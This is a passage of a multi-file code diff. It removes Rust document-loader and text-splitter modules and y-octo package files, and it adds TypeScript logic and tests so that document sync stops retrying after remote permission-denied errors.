let language = match extension.to_lowercase().as_str() {
"rs" => Language::Rust,
"c" => Language::C,
"cpp" => Language::Cpp,
"h" => Language::C,
"hpp" => Language::Cpp,
"js" => Language::Javascript,
"ts" => Language::Typescript,
"tsx" => Language::Typescript,
"go" => Language::Go,
"py" => Language::Python,
_ => return Err(LoaderError::UnsupportedLanguage),
};
Ok(language)
}
fn get_language_parser(language: &Language) -> Parser {
let mut parser = Parser::new();
let lang = match language {
Language::Rust => tree_sitter_rust::LANGUAGE,
Language::C => tree_sitter_c::LANGUAGE,
Language::Cpp => tree_sitter_cpp::LANGUAGE,
Language::Javascript => tree_sitter_javascript::LANGUAGE,
Language::Typescript => tree_sitter_typescript::LANGUAGE_TSX,
Language::Go => tree_sitter_go::LANGUAGE,
Language::Python => tree_sitter_python::LANGUAGE,
};
parser
.set_language(&lang.into())
.unwrap_or_else(|_| panic!("Error loading grammar for language: {language:?}"));
parser
}
impl LanguageParser {
pub fn from_language(language: Language) -> Self {
Self {
parser: get_language_parser(&language),
parser_options: LanguageParserOptions {
language,
..LanguageParserOptions::default()
},
}
}
pub fn with_parser_threshold(mut self, threshold: u64) -> Self {
self.parser_options.parser_threshold = threshold;
self
}
}
impl LanguageParser {
pub fn parse_code(&mut self, code: &String) -> LoaderResult<Vec<Document>> {
let tree = self.parser.parse(code, None).ok_or(LoaderError::UnsupportedLanguage)?;
if self.parser_options.parser_threshold > tree.root_node().end_position().row as u64 {
return Ok(vec![Document::new(code).with_metadata(HashMap::from([
(
"content_type".to_string(),
serde_json::Value::from(LanguageContentTypes::SimplifiedCode.to_string()),
),
(
"language".to_string(),
serde_json::Value::from(self.parser_options.language.to_string()),
),
]))]);
}
self.extract_functions_classes(tree, code)
}
pub fn extract_functions_classes(&self, tree: Tree, code: &String) -> LoaderResult<Vec<Document>> {
let mut chunks = Vec::new();
let count = tree.root_node().child_count();
for i in 0..count {
let Some(node) = tree.root_node().child(i) else {
continue;
};
let source_code = node.utf8_text(code.as_bytes())?.to_string();
let lang_meta = (
"language".to_string(),
serde_json::Value::from(self.parser_options.language.to_string()),
);
if node.kind() == "function_item" || node.kind() == "impl_item" {
let doc = Document::new(source_code).with_metadata(HashMap::from([
lang_meta.clone(),
(
"content_type".to_string(),
serde_json::Value::from(LanguageContentTypes::FunctionsImpls.to_string()),
),
]));
chunks.push(doc);
} else {
let doc = Document::new(source_code).with_metadata(HashMap::from([
lang_meta.clone(),
(
"content_type".to_string(),
serde_json::Value::from(LanguageContentTypes::SimplifiedCode.to_string()),
),
]));
chunks.push(doc);
}
}
Ok(chunks)
}
}
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn test_code_parser() {
let code = r#"
fn main() {
println!("Hello, world!");
}
pub struct Person {
name: String,
age: i32,
}
impl Person {
pub fn new(name: String, age: i32) -> Self {
Self { name, age }
}
pub fn get_name(&self) -> &str {
&self.name
}
pub fn get_age(&self) -> i32 {
self.age
}
}
"#;
let mut parser = LanguageParser::from_language(Language::Rust);
let documents = parser.parse_code(&code.to_string()).unwrap();
assert_eq!(documents.len(), 1);
// Set the parser threshold to 10 for testing
let mut parser = parser.with_parser_threshold(10);
let documents = parser.parse_code(&code.to_string()).unwrap();
assert_eq!(documents.len(), 3);
assert_eq!(
documents[0].page_content,
"fn main() {\n println!(\"Hello, world!\");\n }"
);
assert_eq!(
documents[1].metadata.get("content_type").unwrap(),
LanguageContentTypes::SimplifiedCode.to_string().as_str()
);
}
}
@@ -1,22 +0,0 @@
/**
* modified from https://github.com/Abraxas-365/langchain-rust/tree/v4.6.0/src/document_loaders
*/
use super::*;
#[derive(Debug, Clone)]
pub struct TextLoader {
content: String,
}
impl TextLoader {
pub fn new<T: Into<String>>(input: T) -> Self {
Self { content: input.into() }
}
}
impl Loader for TextLoader {
fn load(self) -> LoaderResult<Vec<Document>> {
let doc = Document::new(self.content);
Ok(vec![doc])
}
}
@@ -1,14 +0,0 @@
mod document;
mod error;
mod loader;
mod splitter;
mod types;
pub use document::{Chunk, Doc};
pub use error::{LoaderError, LoaderResult};
use loader::{
DocxLoader, HtmlLoader, LanguageParserOptions, Loader, PdfExtractLoader, SourceCodeLoader, TextLoader, Url,
get_language_by_filename,
};
use splitter::{MarkdownSplitter, TextSplitter, TextSplitterError, TokenSplitter};
use types::Document;
@@ -1,35 +0,0 @@
/**
* modified from https://github.com/Abraxas-365/langchain-rust/tree/v4.6.0/src/text_splitter
*/
use text_splitter::ChunkConfigError;
use thiserror::Error;
#[derive(Error, Debug)]
pub enum TextSplitterError {
#[error("Empty input text")]
EmptyInputText,
#[error("Mismatch metadata and text")]
MetadataTextMismatch,
#[error("Tokenizer not found")]
TokenizerNotFound,
#[error("Tokenizer creation failed due to invalid tokenizer")]
InvalidTokenizer,
#[error("Tokenizer creation failed due to invalid model")]
InvalidModel,
#[error("Invalid chunk overlap and size")]
InvalidSplitterOptions,
#[error("Error: {0}")]
OtherError(String),
}
impl From<ChunkConfigError> for TextSplitterError {
fn from(_: ChunkConfigError) -> Self {
Self::InvalidSplitterOptions
}
}
@@ -1,36 +0,0 @@
use text_splitter::ChunkConfig;
/**
* modified from https://github.com/Abraxas-365/langchain-rust/tree/v4.6.0/src/text_splitter
*/
use super::*;
pub struct MarkdownSplitter {
splitter_options: SplitterOptions,
}
impl Default for MarkdownSplitter {
fn default() -> Self {
MarkdownSplitter::new(SplitterOptions::default())
}
}
impl MarkdownSplitter {
pub fn new(options: SplitterOptions) -> MarkdownSplitter {
MarkdownSplitter {
splitter_options: options,
}
}
}
impl TextSplitter for MarkdownSplitter {
fn split_text(&self, text: &str) -> Result<Vec<String>, TextSplitterError> {
let chunk_config = ChunkConfig::try_from(&self.splitter_options)?;
Ok(
text_splitter::MarkdownSplitter::new(chunk_config)
.chunks(text)
.map(|x| x.to_string())
.collect(),
)
}
}
@@ -1,58 +0,0 @@
/**
* modified from https://github.com/Abraxas-365/langchain-rust/tree/v4.6.0/src/text_splitter
*/
mod error;
mod markdown;
mod options;
mod token;
use std::collections::HashMap;
pub use error::TextSplitterError;
pub use markdown::MarkdownSplitter;
use options::SplitterOptions;
use serde_json::Value;
pub use token::TokenSplitter;
use super::*;
pub trait TextSplitter: Send + Sync {
fn split_text(&self, text: &str) -> Result<Vec<String>, TextSplitterError>;
fn split_documents(&self, documents: &[Document]) -> Result<Vec<Document>, TextSplitterError> {
let mut texts: Vec<String> = Vec::new();
let mut metadata: Vec<HashMap<String, Value>> = Vec::new();
documents.iter().for_each(|d| {
texts.push(d.page_content.clone());
metadata.push(d.metadata.clone());
});
self.create_documents(&texts, &metadata)
}
fn create_documents(
&self,
text: &[String],
metadata: &[HashMap<String, Value>],
) -> Result<Vec<Document>, TextSplitterError> {
let mut metadata = metadata.to_vec();
if metadata.is_empty() {
metadata = vec![HashMap::new(); text.len()];
}
if text.len() != metadata.len() {
return Err(TextSplitterError::MetadataTextMismatch);
}
let mut documents: Vec<Document> = Vec::new();
for i in 0..text.len() {
let chunks = self.split_text(&text[i])?;
for chunk in chunks {
let document = Document::new(chunk).with_metadata(metadata[i].clone());
documents.push(document);
}
}
Ok(documents)
}
}
@@ -1,97 +0,0 @@
/**
* modified from https://github.com/Abraxas-365/langchain-rust/tree/v4.6.0/src/text_splitter
*/
use text_splitter::ChunkConfig;
use tiktoken_rs::{CoreBPE, get_bpe_from_model, get_bpe_from_tokenizer, tokenizer::Tokenizer};
use super::TextSplitterError;
// Options is a struct that contains options for a text splitter.
#[derive(Debug, Clone)]
pub struct SplitterOptions {
pub chunk_size: usize,
pub chunk_overlap: usize,
pub model_name: String,
pub encoding_name: String,
pub trim_chunks: bool,
}
impl Default for SplitterOptions {
fn default() -> Self {
Self::new()
}
}
impl SplitterOptions {
pub fn new() -> Self {
SplitterOptions {
chunk_size: 7168,
chunk_overlap: 128,
model_name: String::from("gpt-3.5-turbo"),
encoding_name: String::from("cl100k_base"),
trim_chunks: true,
}
}
}
// Builder pattern for Options struct
impl SplitterOptions {
pub fn with_chunk_size(mut self, chunk_size: usize) -> Self {
self.chunk_size = chunk_size;
self
}
pub fn with_chunk_overlap(mut self, chunk_overlap: usize) -> Self {
self.chunk_overlap = chunk_overlap;
self
}
pub fn with_model_name(mut self, model_name: &str) -> Self {
self.model_name = String::from(model_name);
self
}
pub fn with_encoding_name(mut self, encoding_name: &str) -> Self {
self.encoding_name = String::from(encoding_name);
self
}
pub fn with_trim_chunks(mut self, trim_chunks: bool) -> Self {
self.trim_chunks = trim_chunks;
self
}
pub fn get_tokenizer_from_str(s: &str) -> Option<Tokenizer> {
match s.to_lowercase().as_str() {
"o200k_base" => Some(Tokenizer::O200kBase),
"cl100k_base" => Some(Tokenizer::Cl100kBase),
"p50k_base" => Some(Tokenizer::P50kBase),
"r50k_base" => Some(Tokenizer::R50kBase),
"p50k_edit" => Some(Tokenizer::P50kEdit),
"gpt2" => Some(Tokenizer::Gpt2),
_ => None,
}
}
}
impl TryFrom<&SplitterOptions> for ChunkConfig<CoreBPE> {
type Error = TextSplitterError;
fn try_from(options: &SplitterOptions) -> Result<Self, Self::Error> {
let tk = if !options.encoding_name.is_empty() {
let tokenizer =
SplitterOptions::get_tokenizer_from_str(&options.encoding_name).ok_or(TextSplitterError::TokenizerNotFound)?;
get_bpe_from_tokenizer(tokenizer).map_err(|_| TextSplitterError::InvalidTokenizer)?
} else {
get_bpe_from_model(&options.model_name).map_err(|_| TextSplitterError::InvalidModel)?
};
Ok(
ChunkConfig::new(options.chunk_size)
.with_sizer(tk)
.with_trim(options.trim_chunks)
.with_overlap(options.chunk_overlap)?,
)
}
}
@@ -1,37 +0,0 @@
use text_splitter::ChunkConfig;
/**
* modified from https://github.com/Abraxas-365/langchain-rust/tree/v4.6.0/src/text_splitter
*/
use super::*;
#[derive(Debug, Clone)]
pub struct TokenSplitter {
splitter_options: SplitterOptions,
}
impl Default for TokenSplitter {
fn default() -> Self {
TokenSplitter::new(SplitterOptions::default())
}
}
impl TokenSplitter {
pub fn new(options: SplitterOptions) -> TokenSplitter {
TokenSplitter {
splitter_options: options,
}
}
}
impl TextSplitter for TokenSplitter {
fn split_text(&self, text: &str) -> Result<Vec<String>, TextSplitterError> {
let chunk_config = ChunkConfig::try_from(&self.splitter_options)?;
Ok(
text_splitter::TextSplitter::new(chunk_config)
.chunks(text)
.map(|x| x.to_string())
.collect(),
)
}
}
@@ -1,37 +0,0 @@
use std::collections::HashMap;
use serde_json::Value;
#[derive(Debug, Clone)]
pub struct Document {
pub page_content: String,
pub metadata: HashMap<String, Value>,
}
impl Document {
/// Constructs a new `Document` with provided `page_content`, an empty
/// `metadata` map and a `score` of 0.
pub fn new<S: Into<String>>(page_content: S) -> Self {
Document {
page_content: page_content.into(),
metadata: HashMap::new(),
}
}
/// Sets the `metadata` Map of the `Document` to the provided HashMap.
pub fn with_metadata(mut self, metadata: HashMap<String, Value>) -> Self {
self.metadata = metadata;
self
}
}
impl Default for Document {
/// Provides a default `Document` with an empty `page_content`, an empty
/// `metadata` map and a `score` of 0.
fn default() -> Self {
Document {
page_content: "".to_string(),
metadata: HashMap::new(),
}
}
}
-2
View File
@@ -1,5 +1,3 @@
#[cfg(feature = "doc-loader")]
pub mod doc_loader;
#[cfg(feature = "ydoc-loader")]
pub mod doc_parser;
#[cfg(feature = "hashcash")]
@@ -33,6 +33,7 @@ import {
SpaceStorage,
} from '../storage';
import { Sync } from '../sync';
import { DocSyncPeer } from '../sync/doc/peer';
import { IndexerSyncImpl } from '../sync/indexer';
import { expectYjsEqual } from './utils';
@@ -112,6 +113,64 @@ class TestDocStorage implements DocStorage {
}
}
class PermissionDeniedRemoteDocStorage implements DocStorage {
readonly storageType = 'doc' as const;
readonly connection = new DummyConnection();
readonly isReadonly = false;
pushCount = 0;
constructor(readonly spaceId: string) {}
async getDoc(_docId: string): Promise<DocRecord | null> {
return null;
}
async getDocDiff(
_docId: string,
_state?: Uint8Array
): Promise<DocDiff | null> {
return null;
}
async pushDocUpdate(_update: DocUpdate): Promise<DocClock> {
this.pushCount++;
const error = new Error('No permission to update doc');
error.name = 'DOC_ACTION_DENIED';
throw error;
}
async getDocTimestamp(_docId: string): Promise<DocClock | null> {
return null;
}
async getDocTimestamps(): Promise<DocClocks> {
return {};
}
async deleteDoc(_docId: string): Promise<void> {
return;
}
subscribeDocUpdate(_callback: (update: DocRecord, origin?: string) => void) {
return () => {};
}
}
class PermissionDeniedConnection extends DummyConnection {
waitCount = 0;
override async waitForConnected(_signal?: AbortSignal): Promise<void> {
this.waitCount++;
const error = new Error('No permission to access space');
error.name = 'SPACE_ACCESS_DENIED';
throw error;
}
}
class PermissionDeniedConnectionDocStorage extends PermissionDeniedRemoteDocStorage {
override readonly connection = new PermissionDeniedConnection();
}
class TrackingIndexerStorage extends IndexerStorageBase {
override readonly connection = new DummyConnection();
override readonly isReadonly = false;
@@ -425,6 +484,201 @@ test('blob', async () => {
}
});
test('doc sync peer stops retrying a doc when remote denies permission', async () => {
const local = new IndexedDBDocStorage({
id: 'ws-denied',
flavour: 'local-denied',
type: 'workspace',
});
const syncMetadata = new IndexedDBDocSyncStorage({
id: 'ws-denied',
flavour: 'local-denied',
type: 'workspace',
});
const remote = new PermissionDeniedRemoteDocStorage('ws-denied');
const peer = new DocSyncPeer('remote-denied', local, syncMetadata, remote);
const abort = new AbortController();
local.connection.connect();
syncMetadata.connection.connect();
await local.connection.waitForConnected();
await syncMetadata.connection.waitForConnected();
const doc = new YDoc();
doc.getMap('test').set('hello', 'world');
await local.pushDocUpdate({
docId: 'doc-denied',
bin: encodeStateAsUpdate(doc),
});
try {
void peer.mainLoop(abort.signal);
await vi.waitFor(() => {
expect(remote.pushCount).toBe(1);
});
await vi.waitFor(() => {
let state:
| {
syncing: boolean;
synced: boolean;
retrying: boolean;
errorMessage: string | null;
}
| undefined;
const dispose = peer.docState$('doc-denied').subscribe(next => {
state = next;
});
dispose.unsubscribe();
expect(state).toMatchObject({
syncing: false,
synced: false,
retrying: false,
errorMessage: expect.stringContaining('No permission'),
});
});
await vi.waitFor(() => {
let state:
| {
synced: boolean;
errorMessage: string | null;
}
| undefined;
const dispose = peer.peerState$.subscribe(next => {
state = next;
});
dispose.unsubscribe();
expect(state).toMatchObject({
synced: false,
errorMessage: expect.stringContaining('No permission'),
});
});
await new Promise(resolve => setTimeout(resolve, 1200));
expect(remote.pushCount).toBe(1);
} finally {
abort.abort();
local.connection.disconnect();
syncMetadata.connection.disconnect();
}
});
test('doc sync peer stops retrying when remote connection denies permission', async () => {
const local = new IndexedDBDocStorage({
id: 'ws-connection-denied',
flavour: 'local-connection-denied',
type: 'workspace',
});
const syncMetadata = new IndexedDBDocSyncStorage({
id: 'ws-connection-denied',
flavour: 'local-connection-denied',
type: 'workspace',
});
const remote = new PermissionDeniedConnectionDocStorage(
'ws-connection-denied'
);
const peer = new DocSyncPeer(
'remote-connection-denied',
local,
syncMetadata,
remote
);
const abort = new AbortController();
local.connection.connect();
syncMetadata.connection.connect();
await local.connection.waitForConnected();
await syncMetadata.connection.waitForConnected();
try {
void peer.mainLoop(abort.signal);
await vi.waitFor(() => {
expect(remote.connection.waitCount).toBe(1);
});
await vi.waitFor(() => {
let state:
| {
retrying: boolean;
errorMessage: string | null;
}
| undefined;
const dispose = peer.peerState$.subscribe(next => {
state = next;
});
dispose.unsubscribe();
expect(state).toMatchObject({
retrying: false,
errorMessage: expect.stringContaining('No permission'),
});
});
await new Promise(resolve => setTimeout(resolve, 1200));
expect(remote.connection.waitCount).toBe(1);
} finally {
abort.abort();
local.connection.disconnect();
syncMetadata.connection.disconnect();
}
});
test('doc sync peer resolves on terminal permission error without abort signal', async () => {
const local = new IndexedDBDocStorage({
id: 'ws-connection-denied-no-signal',
flavour: 'local-connection-denied-no-signal',
type: 'workspace',
});
const syncMetadata = new IndexedDBDocSyncStorage({
id: 'ws-connection-denied-no-signal',
flavour: 'local-connection-denied-no-signal',
type: 'workspace',
});
const remote = new PermissionDeniedConnectionDocStorage(
'ws-connection-denied-no-signal'
);
const peer = new DocSyncPeer(
'remote-connection-denied-no-signal',
local,
syncMetadata,
remote
);
local.connection.connect();
syncMetadata.connection.connect();
await local.connection.waitForConnected();
await syncMetadata.connection.waitForConnected();
try {
await expect(peer.mainLoop()).resolves.toBeUndefined();
expect(remote.connection.waitCount).toBe(1);
let state:
| {
retrying: boolean;
errorMessage: string | null;
}
| undefined;
const dispose = peer.peerState$.subscribe(next => {
state = next;
});
dispose.unsubscribe();
expect(state).toMatchObject({
retrying: false,
errorMessage: expect.stringContaining('No permission'),
});
} finally {
local.connection.disconnect();
syncMetadata.connection.disconnect();
}
});
test('indexer defers indexed clock persistence until a refresh happens on delayed refresh storages', async () => {
const calls: string[] = [];
const docsInRootDoc = new Map([['doc1', { title: 'Doc 1' }]]);
+19 -8
View File
@@ -22,6 +22,12 @@ interface CloudDocStorageOptions extends DocStorageOptions {
type: SpaceType;
}
function createWebsocketError(error: { name: string; message: string }) {
const err = new Error(error.message);
err.name = error.name;
return err;
}
export class CloudDocStorage extends DocStorageBase<CloudDocStorageOptions> {
static readonly identifier = 'CloudDocStorage';
@@ -88,7 +94,7 @@ export class CloudDocStorage extends DocStorageBase<CloudDocStorageOptions> {
return null;
}
// TODO: use [UserFriendlyError]
throw new Error(response.error.message);
throw createWebsocketError(response.error);
}
return {
@@ -111,7 +117,7 @@ export class CloudDocStorage extends DocStorageBase<CloudDocStorageOptions> {
return null;
}
// TODO: use [UserFriendlyError]
throw new Error(response.error.message);
throw createWebsocketError(response.error);
}
return {
@@ -132,7 +138,7 @@ export class CloudDocStorage extends DocStorageBase<CloudDocStorageOptions> {
if ('error' in response) {
// TODO(@forehalo): use [UserFriendlyError]
throw new Error(response.error.message);
throw createWebsocketError(response.error);
}
return {
@@ -153,7 +159,7 @@ export class CloudDocStorage extends DocStorageBase<CloudDocStorageOptions> {
if ('error' in response) {
// TODO: use [UserFriendlyError]
throw new Error(response.error.message);
throw createWebsocketError(response.error);
}
return {
@@ -174,7 +180,7 @@ export class CloudDocStorage extends DocStorageBase<CloudDocStorageOptions> {
if ('error' in response) {
// TODO(@forehalo): use [UserFriendlyError]
throw new Error(response.error.message);
throw createWebsocketError(response.error);
}
return Object.entries(response.data).reduce((ret, [docId, timestamp]) => {
@@ -184,11 +190,16 @@ export class CloudDocStorage extends DocStorageBase<CloudDocStorageOptions> {
}
override async deleteDoc(docId: string) {
this.socket.emit('space:delete-doc', {
const response = await this.socket.emitWithAck('space:delete-doc', {
spaceType: this.spaceType,
spaceId: this.spaceId,
docId: this.idConverter.newIdToOldId(docId),
});
if ('error' in response) {
// TODO(@forehalo): use [UserFriendlyError]
throw createWebsocketError(response.error);
}
}
protected async setDocSnapshot() {
@@ -224,7 +235,7 @@ class CloudDocStorageConnection extends SocketConnection {
});
if ('error' in res) {
throw new Error(res.error.message);
throw createWebsocketError(res.error);
}
if (!this.idConverter) {
@@ -272,7 +283,7 @@ class CloudDocStorageConnection extends SocketConnection {
return null;
}
// TODO: use [UserFriendlyError]
throw new Error(response.error.message);
throw createWebsocketError(response.error);
}
return base64ToUint8Array(response.data.missing);
@@ -121,7 +121,10 @@ interface ClientEvents {
timestamp: number;
},
];
'space:delete-doc': { spaceType: string; spaceId: string; docId: string };
'space:delete-doc': [
{ spaceType: string; spaceId: string; docId: string },
{ success?: true },
];
'telemetry:batch': [TelemetryBatch, TelemetryAck];
+122 -18
View File
@@ -38,6 +38,7 @@ type Job =
interface Status {
docs: Set<string>;
connectedDocs: Set<string>;
docErrors: Map<string, string>;
jobDocQueue: AsyncPriorityQueue;
jobMap: Map<string, Job[]>;
remoteClocks: ClockMap;
@@ -78,9 +79,12 @@ function createJobErrorCatcher<
await fn(docId, ...args);
} catch (err) {
if (err instanceof Error) {
throw new Error(
const wrapped = new Error(
`Error in job "${k}": ${err.stack || err.message}`
);
wrapped.name = err.name;
(wrapped as Error & { cause?: unknown }).cause = err;
throw wrapped;
} else {
throw err;
}
@@ -91,6 +95,14 @@ function createJobErrorCatcher<
) as Jobs;
}
function isRemotePermissionError(error: unknown) {
if (!(error instanceof Error)) {
return false;
}
const name = error.name.toUpperCase();
return name === 'DOC_ACTION_DENIED' || name === 'SPACE_ACCESS_DENIED';
}
function isEqualUint8Arrays(a: Uint8Array, b: Uint8Array) {
if (a.length !== b.length) {
return false;
@@ -155,6 +167,7 @@ export class DocSyncPeer {
private status: Status = {
docs: new Set<string>(),
connectedDocs: new Set<string>(),
docErrors: new Map<string, string>(),
jobDocQueue: new AsyncPriorityQueue(),
jobMap: new Map(),
remoteClocks: new ClockMap(new Map()),
@@ -165,6 +178,14 @@ export class DocSyncPeer {
};
private readonly statusUpdatedSubject$ = new Subject<string | true>();
private get currentErrorMessage() {
return (
this.status.errorMessage ??
this.status.docErrors.values().next().value ??
null
);
}
peerState$ = new Observable<PeerState>(subscribe => {
const next = () => {
if (this.status.skipped) {
@@ -182,7 +203,7 @@ export class DocSyncPeer {
syncing: this.status.docs.size,
synced: false,
retrying: this.status.retrying,
errorMessage: this.status.errorMessage,
errorMessage: this.currentErrorMessage,
});
} else {
const syncing = this.status.jobMap.size;
@@ -190,8 +211,8 @@ export class DocSyncPeer {
total: this.status.docs.size,
syncing: syncing,
retrying: this.status.retrying,
errorMessage: this.status.errorMessage,
synced: syncing === 0,
errorMessage: this.currentErrorMessage,
synced: syncing === 0 && this.status.docErrors.size === 0,
});
}
};
@@ -211,6 +232,7 @@ export class DocSyncPeer {
docState$(docId: string) {
return new Observable<PeerDocState>(subscribe => {
const next = () => {
const docErrorMessage = this.status.docErrors.get(docId) ?? null;
if (this.status.skipped) {
subscribe.next({
syncing: false,
@@ -218,14 +240,16 @@ export class DocSyncPeer {
retrying: false,
errorMessage: null,
});
return;
}
subscribe.next({
syncing:
!this.status.connectedDocs.has(docId) ||
this.status.jobMap.has(docId),
synced: !this.status.jobMap.has(docId),
!docErrorMessage &&
(!this.status.connectedDocs.has(docId) ||
this.status.jobMap.has(docId)),
synced: !docErrorMessage && !this.status.jobMap.has(docId),
retrying: this.status.retrying,
errorMessage: this.status.errorMessage,
errorMessage: docErrorMessage ?? this.status.errorMessage,
});
};
next();
@@ -469,6 +493,9 @@ export class DocSyncPeer {
private readonly actions = {
updateRemoteClock: (docId: string, remoteClock: Date) => {
if (this.status.docErrors.has(docId)) {
return;
}
this.status.remoteClocks.setIfBigger(docId, remoteClock);
this.statusUpdatedSubject$.next(docId);
},
@@ -494,6 +521,10 @@ export class DocSyncPeer {
update: Uint8Array;
clock: Date;
}) => {
if (this.status.docErrors.has(docId)) {
return;
}
// try add doc for new doc
this.actions.addDoc(docId);
@@ -514,6 +545,10 @@ export class DocSyncPeer {
update: Uint8Array;
remoteClock: Date;
}) => {
if (this.status.docErrors.has(docId)) {
return;
}
// try add doc for new doc
this.actions.addDoc(docId);
this.actions.updateRemoteClock(docId, remoteClock);
@@ -530,33 +565,45 @@ export class DocSyncPeer {
async mainLoop(signal?: AbortSignal) {
while (true) {
let shouldRetry = true;
try {
await this.retryLoop(signal);
} catch (err) {
if (signal?.aborted) {
return;
}
console.warn('Sync error, retry in 5s', err);
shouldRetry = !isRemotePermissionError(err);
console.warn(
shouldRetry
? 'Sync error, retry in 5s'
: 'Sync stopped due to remote permission error',
err
);
this.status.errorMessage =
err instanceof Error ? err.message : `${err}`;
this.status.retrying = shouldRetry;
this.statusUpdatedSubject$.next(true);
} finally {
// reset all status
this.status = {
docs: new Set(),
connectedDocs: new Set(),
docErrors: new Map(),
jobDocQueue: new AsyncPriorityQueue(),
jobMap: new Map(),
remoteClocks: new ClockMap(new Map()),
syncing: false,
skipped: false,
// tell ui to show retrying status
retrying: true,
retrying: shouldRetry,
// error message from last retry
errorMessage: this.status.errorMessage,
};
this.statusUpdatedSubject$.next(true);
}
if (!shouldRetry) {
return;
}
// wait for 5s before next retry
await Promise.race([
new Promise<void>(resolve => {
@@ -725,29 +772,53 @@ export class DocSyncPeer {
const connect = remove(jobs, j => j.type === 'connect');
if (connect && connect.length > 0) {
await this.jobs.connect(docId, signal);
if (
!(await this.runRemoteDocJob(docId, () =>
this.jobs.connect(docId, signal)
))
) {
break;
}
continue;
}
const pullAndPush = remove(jobs, j => j.type === 'pullAndPush');
if (pullAndPush && pullAndPush.length > 0) {
await this.jobs.pullAndPush(docId, signal);
if (
!(await this.runRemoteDocJob(docId, () =>
this.jobs.pullAndPush(docId, signal)
))
) {
break;
}
continue;
}
const pull = remove(jobs, j => j.type === 'pull');
if (pull && pull.length > 0) {
await this.jobs.pull(docId, signal);
if (
!(await this.runRemoteDocJob(docId, () =>
this.jobs.pull(docId, signal)
))
) {
break;
}
continue;
}
const push = remove(jobs, j => j.type === 'push');
if (push && push.length > 0) {
await this.jobs.push(
docId,
push as (Job & { type: 'push' })[],
signal
);
if (
!(await this.runRemoteDocJob(docId, () =>
this.jobs.push(
docId,
push as (Job & { type: 'push' })[],
signal
)
))
) {
break;
}
continue;
}
@@ -771,7 +842,40 @@ export class DocSyncPeer {
}
}
private async runRemoteDocJob(docId: string, job: () => Promise<void>) {
try {
await job();
return true;
} catch (error) {
if (!isRemotePermissionError(error)) {
throw error;
}
const message = error instanceof Error ? error.message : String(error);
console.warn('Sync skipped for doc due to remote permission error', {
docId,
error,
});
this.status.docErrors.set(docId, message);
this.status.connectedDocs.delete(docId);
this.status.jobMap.delete(docId);
this.statusUpdatedSubject$.next(docId);
this.statusUpdatedSubject$.next(true);
return false;
}
}
private schedule(job: Job) {
if (
this.status.docErrors.has(job.docId) &&
(job.type === 'connect' ||
job.type === 'push' ||
job.type === 'pull' ||
job.type === 'pullAndPush')
) {
return;
}
const priority = this.prioritySettings.get(job.docId) ?? 0;
this.status.jobDocQueue.push(job.docId, priority);
-96
View File
@@ -1,96 +0,0 @@
[package]
authors = [
"DarkSky <darksky2048@gmail.com>",
"forehalo <forehalo@gmail.com>",
"x1a0t <405028157@qq.com>",
"Brooklyn <lynweklm@gmail.com>",
]
description = "High-performance and thread-safe CRDT implementation compatible with Yjs"
edition = "2024"
homepage = "https://github.com/toeverything/y-octo"
include = ["src/**/*", "benches/**/*", "bin/**/*", "LICENSE", "README.md"]
keywords = ["collaboration", "crdt", "crdts", "yjs", "yata"]
license = "MIT"
name = "y-octo"
readme = "README.md"
repository = "https://github.com/toeverything/y-octo"
version = "0.0.2"
# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html
[dependencies]
ahash = { workspace = true }
byteorder = { workspace = true }
log = { workspace = true }
nanoid = { workspace = true }
nom = { workspace = true }
ordered-float = { workspace = true }
rand = { workspace = true }
rand_chacha = { workspace = true }
rand_distr = { workspace = true }
serde = { workspace = true, features = ["derive"] }
serde_json = { workspace = true }
smol_str = { workspace = true }
thiserror = { workspace = true }
[features]
bench = []
debug = []
default = []
events = []
large_refs = []
serde_json = []
subscribe = []
[target.'cfg(fuzzing)'.dependencies]
arbitrary = { workspace = true }
ordered-float = { workspace = true, features = ["arbitrary"] }
[target.'cfg(loom)'.dependencies]
loom = { workspace = true }
# override the dev-dependencies feature
async-lock = { workspace = true }
[dev-dependencies]
assert-json-diff = { workspace = true }
criterion = { workspace = true }
lib0 = { workspace = true }
ordered-float = { workspace = true, features = ["proptest"] }
path-ext = { workspace = true }
proptest = { workspace = true }
proptest-derive = { workspace = true }
yrs = { workspace = true }
[lints.rust]
unexpected_cfgs = { level = "warn", check-cfg = [
'cfg(debug)',
'cfg(fuzzing)',
'cfg(loom)',
] }
[[bench]]
harness = false
name = "array_ops_benchmarks"
[[bench]]
harness = false
name = "codec_benchmarks"
[[bench]]
harness = false
name = "map_ops_benchmarks"
[[bench]]
harness = false
name = "text_ops_benchmarks"
[[bench]]
harness = false
name = "apply_benchmarks"
[[bench]]
harness = false
name = "update_benchmarks"
[lib]
bench = true
-9
View File
@@ -1,9 +0,0 @@
The MIT License (MIT)
Copyright (c) 2022-present TOEVERYTHING PTE. LTD. and its affiliates.
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the “Software”), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED “AS IS”, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
-100
View File
@@ -1,100 +0,0 @@
# Y-Octo
[![test](https://github.com/toeverything/y-octo/actions/workflows/y-octo.yml/badge.svg)](https://github.com/toeverything/y-octo/actions/workflows/y-octo.yml)
[![docs]](https://docs.rs/y-octo/latest/y_octo)
[![crates]](https://crates.io/crates/y-octo)
[![codecov]](https://codecov.io/gh/toeverything/y-octo)
Y-Octo is a high-performance CRDT implementation compatible with [yjs].
## Introduction
Y-Octo is a tiny, ultra-fast CRDT collaboration library built for all major platforms. Developers can use Y-Octo as the [Single source of truth](https://en.wikipedia.org/wiki/Single_source_of_truth) for their application state, naturally turning the application into a [local-first](https://www.inkandswitch.com/local-first/) collaborative app.
Y-Octo also has interoperability and binary compatibility with [yjs]. Developers can use [yjs] to develop local-first web applications and collaborate with Y-Octo in native apps alongside web apps.
## Who are using
